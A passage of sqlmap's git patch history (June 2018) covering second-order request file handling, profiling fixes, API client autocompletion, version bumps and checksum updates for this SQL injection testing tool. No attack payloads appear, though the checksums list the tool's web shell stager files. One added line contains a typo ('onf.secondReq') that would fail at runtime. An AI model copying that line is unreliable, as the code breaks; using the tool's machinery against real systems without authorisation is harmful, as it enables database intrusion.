--- a/lib/core/option.py +++ b/lib/core/option.py @@ -285,26 +285,37 @@ def _setRequestFromFile(): textual file, parses it and saves the information into the knowledge base. """ - if not conf.requestFile: - return + if conf.requestFile: + conf.requestFile = safeExpandUser(conf.requestFile) + seen = set() - seen = set() + if not os.path.isfile(conf.requestFile): + errMsg = "specified HTTP request file '%s' " % conf.requestFile + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - conf.requestFile = safeExpandUser(conf.requestFile) + infoMsg = "parsing HTTP request from '%s'" % conf.requestFile + logger.info(infoMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "specified HTTP request file '%s' " % conf.requestFile - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) + for target in parseRequestFile(conf.requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) + if conf.secondReq: + conf.secondReq = safeExpandUser(conf.secondReq) + + if not os.path.isfile(conf.secondReq): + errMsg = "specified second-order HTTP request file '%s' " % onf.secondReq + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) + + infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq + logger.info(infoMsg) - for target in parseRequestFile(conf.requestFile): - url = target[0] - if url not in seen: - kb.targets.add(target) - seen.add(url) + target = parseRequestFile(conf.secondReq).next() + kb.secondReq = target def _setCrawler(): if not conf.crawlDepth: @@ -1823,6 +1834,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.rowXmlMode = False kb.safeCharEncode = False kb.safeReq = AttribDict() + kb.secondReq = None kb.singleLogFlags = set() kb.skipSeqMatcher = False kb.reduceTests = None diff --git a/lib/core/settings.py b/lib/core/settings.py index ec1744eac09..dfc4e9b4e46 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.25" +VERSION = "1.2.6.26" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index a4300d0a44f..dcfd675a8fc 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1237,8 +1237,8 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - elif conf.secondReq: - pass + elif kb.secondReq: + page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 187f76e69d2..afad8a4f388 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -cfd0b24b7da8dd85cd29360e9c6fb56a lib/core/common.py +eb9e08ba86bfcf7d97454357d9838531 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -90a061be1a0658c2bdb197511b61d6fa lib/core/option.py +ee8a51cb09bbbe50984a4588a4f29043 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dc0d040df74bdf0d6a08f41d412b76e7 lib/core/settings.py +12db3bd1245ed6e89910c61e736b1f6b lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -70,7 +70,7 @@ ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -607419fd07bcabc274782dbc7b238e8b lib/request/connect.py +1b5491cc079384f08cbc6b397786e1af lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 8f4488d608a8836c5ecbbdf67129bc5e5746c503 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 00:08:55 +0200 Subject: [PATCH 177/428] Minor patches related to the #739 --- lib/core/common.py | 4 ++-- lib/core/option.py | 6 +++++- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 11 insertions(+), 7 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index afa82648463..32e07e0fd3b 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4475,7 +4475,7 @@ def pollProcess(process, suppress_errors=False): break -def parseRequestFile(reqFile): +def parseRequestFile(reqFile, checkParams=True): """ Parses WebScarab and Burp logs and adds results to the target URL list """ @@ -4624,7 +4624,7 @@ def _parseBurpLog(content): data = data.rstrip("\r\n") if data else data - if getPostReq and (params or cookie): + if getPostReq and (params or cookie or not checkParams): if not port and isinstance(scheme, basestring) and scheme.lower() == "https": port = "443" elif not scheme and port == "443": diff --git a/lib/core/option.py b/lib/core/option.py index 17dd6ab647a..f9151e05c00 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -314,7 +314,7 @@ def _setRequestFromFile(): infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq logger.info(infoMsg) - target = parseRequestFile(conf.secondReq).next() + target = parseRequestFile(conf.secondReq, False).next() kb.secondReq = target def _setCrawler(): @@ -2224,6 +2224,10 @@ def _basicOptionValidation(): errMsg = "switch '--eta' is incompatible with option '-v'" raise SqlmapSyntaxException(errMsg) + if conf.secondUrl and conf.secondReq: + errMsg = "option '--second-url' is incompatible with option '--second-req')" + raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.url: errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index dfc4e9b4e46..35c0b73c568 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.26" +VERSION = "1.2.6.27" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index afad8a4f388..d6e992f8eb8 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -eb9e08ba86bfcf7d97454357d9838531 lib/core/common.py +fee729e63aab1519fe485af45f4fb1ea lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py -ee8a51cb09bbbe50984a4588a4f29043 lib/core/option.py +d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -12db3bd1245ed6e89910c61e736b1f6b lib/core/settings.py +e9356ecbc79a58112311c4626c0e1c2d lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 2b55ae3e2ab8c79800cec88ed431783b50e02438 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 13:06:56 +0200 Subject: [PATCH 178/428] Minor just in case update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 32e07e0fd3b..36f10c25f93 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1031,7 +1031,7 @@ def readInput(message, default=None, checkBatch=True, boolean=False): logger.debug(debugMsg) if retVal is None: - if checkBatch and conf.get("batch"): + if checkBatch and conf.get("batch") or conf.get("api"): if isListLike(default): options = ','.join(getUnicode(opt, UNICODE_ENCODING) for opt in default) elif default: diff --git a/lib/core/settings.py b/lib/core/settings.py index 35c0b73c568..e3feaf6e55f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.27" +VERSION = "1.2.6.28" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d6e992f8eb8..71f30de8d26 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -fee729e63aab1519fe485af45f4fb1ea lib/core/common.py +e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e9356ecbc79a58112311c4626c0e1c2d lib/core/settings.py +eceda1743cad3fb421344c19ab4148ed lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From e5968cae3119062371f664cdc573da5a6b368939 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 13:51:03 +0200 Subject: [PATCH 179/428] Fixes --profile --- lib/core/profiling.py | 29 +++++++++++++++++------------ lib/core/settings.py | 2 +- sqlmap.py | 28 +++++++++++++++------------- txt/checksum.md5 | 6 +++--- 4 files changed, 36 insertions(+), 29 deletions(-) diff --git a/lib/core/profiling.py b/lib/core/profiling.py index c1bd8acd57b..ec04b59c0ae 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): if isinstance(pydotGraph, list): pydotGraph = pydotGraph[0] - pydotGraph.write_png(imageOutputFile) - - infoMsg = "displaying interactive graph with xdot library" - logger.info(infoMsg) - - # Display interactive Graphviz dot file by using extra/xdot/xdot.py - # http://code.google.com/p/jrfonseca/wiki/XDot - win = xdot.DotWindow() - win.connect('destroy', gtk.main_quit) - win.set_filter("dot") - win.open_file(dotOutputFile) - gtk.main() + try: + pydotGraph.write_png(imageOutputFile) + except OSError: + errMsg = "profiling requires graphviz installed " + errMsg += "(Hint: 'sudo apt-get install graphviz')" + logger.error(errMsg) + else: + infoMsg = "displaying interactive graph with xdot library" + logger.info(infoMsg) + + # Display interactive Graphviz dot file by using extra/xdot/xdot.py + # http://code.google.com/p/jrfonseca/wiki/XDot + win = xdot.DotWindow() + win.connect('destroy', gtk.main_quit) + win.set_filter("dot") + win.open_file(dotOutputFile) + gtk.main() diff --git a/lib/core/settings.py b/lib/core/settings.py index e3feaf6e55f..7003b500f01 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.28" +VERSION = "1.2.6.29" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index 75272136ead..62d850da396 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -143,10 +143,7 @@ def main(): if not conf.updateAll: # Postponed imports (faster start) - if conf.profile: - from lib.core.profiling import profile - profile() - elif conf.smokeTest: + if conf.smokeTest: from lib.core.testing import smokeTest smokeTest() elif conf.liveTest: @@ -154,15 +151,20 @@ def main(): liveTest() else: from lib.controller.controller import start - try: - start() - except thread.error as ex: - if "can't start new thread" in getSafeExString(ex): - errMsg = "unable to start new threads. Please check OS (u)limits" - logger.critical(errMsg) - raise SystemExit - else: - raise + if conf.profile: + from lib.core.profiling import profile + globals()["start"] = start + profile() + else: + try: + start() + except thread.error as ex: + if "can't start new thread" in getSafeExString(ex): + errMsg = "unable to start new threads. Please check OS (u)limits" + logger.critical(errMsg) + raise SystemExit + else: + raise except SqlmapUserQuitException: errMsg = "user quit" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 71f30de8d26..47f7e6b5955 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -43,12 +43,12 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py +945b313b8bb9713f570f5ebb05416799 lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -eceda1743cad3fb421344c19ab4148ed lib/core/settings.py +e5a223ce6a904c33c896cc6a6161eb01 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -226,7 +226,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ 4eaeef94314956e4517e5310a28d579a sqlmapapi.py -c5ecca109867f7ce4d325f487cf7badd sqlmap.py +b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py 1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py From 717c451b8c494041b782ccfea7327ccc82588760 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 15:21:42 +0200 Subject: [PATCH 180/428] Trivial style update --- lib/core/profiling.py | 2 +- lib/core/settings.py | 2 +- lib/parse/payloads.py | 4 ++-- txt/checksum.md5 | 6 +++--- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/profiling.py b/lib/core/profiling.py index ec04b59c0ae..def2b2af3c0 100644 --- a/lib/core/profiling.py +++ b/lib/core/profiling.py @@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None): if os.path.exists(imageOutputFile): os.remove(imageOutputFile) - infoMsg = "profiling the execution into file %s" % profileOutputFile + infoMsg = "profiling the execution into file '%s'" % profileOutputFile logger.info(infoMsg) # Start sqlmap main function and generate a raw profile file diff --git a/lib/core/settings.py b/lib/core/settings.py index 7003b500f01..f9bacb13c8a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.29" +VERSION = "1.2.6.30" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py index 0eda511951f..ee4d8573d13 100644 --- a/lib/parse/payloads.py +++ b/lib/parse/payloads.py @@ -36,7 +36,7 @@ def cleanupVals(text, tag): return text def parseXmlNode(node): - for element in node.getiterator('boundary'): + for element in node.getiterator("boundary"): boundary = AttribDict() for child in element.getchildren(): @@ -48,7 +48,7 @@ def parseXmlNode(node): conf.boundaries.append(boundary) - for element in node.getiterator('test'): + for element in node.getiterator("test"): test = AttribDict() for child in element.getchildren(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 47f7e6b5955..097007740b0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -43,12 +43,12 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py d2672b24ffa985523066613138fccbbd lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py -945b313b8bb9713f570f5ebb05416799 lib/core/profiling.py +6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -e5a223ce6a904c33c896cc6a6161eb01 lib/core/settings.py +4a7888756dc009a582de9f4ed7dfd683 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -65,7 +65,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py 1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py 1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py -ec4e56bbb1349176b2a22e0b99ba6a55 lib/parse/payloads.py +f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py From 72ff6e24ff423e6c71a422efeec15dc178825d3e Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 17:15:35 +0200 Subject: [PATCH 181/428] Minor wording update --- lib/core/settings.py | 2 +- lib/utils/api.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index f9bacb13c8a..e6414d6aa65 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.30" +VERSION = "1.2.6.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index ee0cab9c71a..9da094f0a68 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -687,7 +687,7 @@ def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=REST except ImportError: if adapter.lower() not in server_names: errMsg = "Adapter '%s' is unknown. " % adapter - errMsg += "(Note: available adapters '%s')" % ', '.join(sorted(server_names.keys())) + errMsg += "List of supported adapters: %s" % ', '.join(sorted(server_names.keys())) else: errMsg = "Server support for adapter '%s' is not installed on this system " % adapter errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 097007740b0..abba562446d 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a7888756dc009a582de9f4ed7dfd683 lib/core/settings.py +09e31da3cc7ba29d6d2cf251284df707 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py @@ -100,7 +100,7 @@ f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -ecedf10e09525ac4be07bd27cbd31d81 lib/utils/api.py +bec403b9c2816c96ae4cac87dff70bbe lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py From 27ff5d6fec3066821f5bac06d623f415d686edb2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 20 Jun 2018 23:04:58 +0200 Subject: [PATCH 182/428] Implementation of #3156 --- lib/core/common.py | 1 + lib/core/enums.py | 1 + lib/core/settings.py | 2 +- lib/core/shell.py | 4 ++++ lib/utils/api.py | 8 ++++++++ txt/checksum.md5 | 10 +++++----- 6 files changed, 20 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 36f10c25f93..ac6bc7b7a26 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1274,6 +1274,7 @@ def setPaths(rootPath): paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") # sqlmap files + paths.API_SHELL_HISTORY = os.path.join(_, "api.hst") paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst") paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst") paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst") diff --git a/lib/core/enums.py b/lib/core/enums.py index 638b80bbb63..a1a45007129 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -382,6 +382,7 @@ class AUTOCOMPLETE_TYPE: SQL = 0 OS = 1 SQLMAP = 2 + API = 3 class NOTE: FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" diff --git a/lib/core/settings.py b/lib/core/settings.py index e6414d6aa65..28ae3253d0b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.32" +VERSION = "1.2.6.33" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/shell.py b/lib/core/shell.py index 3920d68f99e..7eeef4ee5c7 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -60,6 +60,8 @@ def saveHistory(completion=None): historyPath = paths.SQL_SHELL_HISTORY elif completion == AUTOCOMPLETE_TYPE.OS: historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY else: historyPath = paths.SQLMAP_SHELL_HISTORY @@ -86,6 +88,8 @@ def loadHistory(completion=None): historyPath = paths.SQL_SHELL_HISTORY elif completion == AUTOCOMPLETE_TYPE.OS: historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY else: historyPath = paths.SQLMAP_SHELL_HISTORY diff --git a/lib/utils/api.py b/lib/utils/api.py index 9da094f0a68..543aa75e96c 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -33,6 +33,7 @@ from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults +from lib.core.enums import AUTOCOMPLETE_TYPE from lib.core.enums import CONTENT_STATUS from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PART_RUN_CONTENT_TYPES @@ -43,6 +44,10 @@ from lib.core.settings import IS_WIN from lib.core.settings import RESTAPI_DEFAULT_ADDRESS from lib.core.settings import RESTAPI_DEFAULT_PORT +from lib.core.shell import autoCompletion +from lib.core.shell import clearHistory +from lib.core.shell import loadHistory +from lib.core.shell import saveHistory from lib.core.subprocessng import Popen from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error @@ -741,6 +746,9 @@ def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, username=Non logger.critical(errMsg) return + commands = ("help", "new", "use", "data", "log", "status", "option", "stop", "kill", "list", "flush", "exit", "bye", "quit") + autoCompletion(AUTOCOMPLETE_TYPE.API, commands=commands) + taskid = None logger.info("Type 'help' or '?' for list of available commands") diff --git a/txt/checksum.md5 b/txt/checksum.md5 index abba562446d..65e2aed58ae 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py +6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -36,7 +36,7 @@ e9ea20ebda48080ff80f4b87b0085e6c lib/core/common.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py f92abf47b2a41b75cd4b89ff0c93194c lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py -bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py +afca5fd7ec20d29c30522a007cf3160f lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py @@ -48,8 +48,8 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 